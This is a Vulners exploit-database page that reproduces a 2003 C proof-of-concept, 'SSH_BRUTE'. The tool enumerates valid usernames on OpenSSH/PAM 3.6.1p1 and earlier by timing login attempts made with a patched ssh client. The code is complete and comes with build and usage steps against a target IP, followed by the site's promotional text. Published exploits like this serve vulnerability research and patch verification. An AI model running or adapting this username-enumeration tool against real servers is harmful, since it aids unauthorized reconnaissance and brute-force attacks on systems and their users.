Vulners
Lucene search
OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
/*
* SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
* Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
*
*
* Vulnerability discovered by Marco Ivaldi <[email protected]>
* Proof of concept code by Maurizio Agazzini <[email protected]>
*
* Tested against Red Hat, Mandrake, and Debian GNU/Linux.
*
* Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
*
* $ tar xvfz openssh-3.6.1p1.tar.gz
* $ patch -p0 <openssh-3.6.1p1_brute.diff
* patching file openssh-3.6.1p1/ssh.c
* patching file openssh-3.6.1p1/sshconnect.c
* patching file openssh-3.6.1p1/sshconnect1.c
* patching file openssh-3.6.1p1/sshconnect2.c
* $ cd openssh-3.6.1p1
* $ ./configure
* $ make
* $ cc ../ssh_brute.c -o ssh_brute
* $ ./ssh_brute 1 list.txt 192.168.0.66
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
/* an illegal user */
#define NO_USER "not_val_user"
/* path of the patched ssh */
#define PATH_SSH "./ssh"
/* max time range for invalid user */
#define TIME_RANGE 3
int main(int argc, char *argv[])
{
FILE * in;
char buffer[2000], username[100], *host;
int time_non_valid = 0, time_user = 0;
int version = 1, i = 0, ret;
fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n");
if (argc < 3) {
fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
exit(-1);
}
version = atoi(argv[1]);
host = argv[3];
if ( ( in = fopen(argv[2], "r") ) == NULL ) {
fprintf(stderr, "\n Can't open %s\n", argv[2]);
exit(-1);
}
/* test an illegal user */
printf("\n Testing an illegal user\t: ");
fflush(stdout);
sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);
for (i = 0; i < 3; i++) {
ret = system(buffer);
time_non_valid += WEXITSTATUS(ret);
}
time_non_valid /= 3;
printf("%d second(s)\n\n", time_non_valid);
time_non_valid += TIME_RANGE;
/* test supplied users */
fscanf(in, "%s", username);
while ( !feof(in) ) {
printf(" Testing login %s\t", username);
if (strlen(username) <= 8)
printf("\t");
printf(": ");
fflush( stdout );
sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, username, host);
ret = system(buffer);
time_user = WEXITSTATUS(ret);
if (time_user <= time_non_valid)
printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user);
else {
/* valid user? test it again to be sure */
ret = system(buffer);
time_user = WEXITSTATUS(ret);
if (time_user <= time_non_valid)
printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user);
else
printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user);
}
fscanf(in, "%s", username);
}
fclose(in);
printf("\n");
exit(0);
}
// milw0rm.com [2003-04-30]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Apr 2003 00:00Current
7.1High risk
Vulners AI Score7.1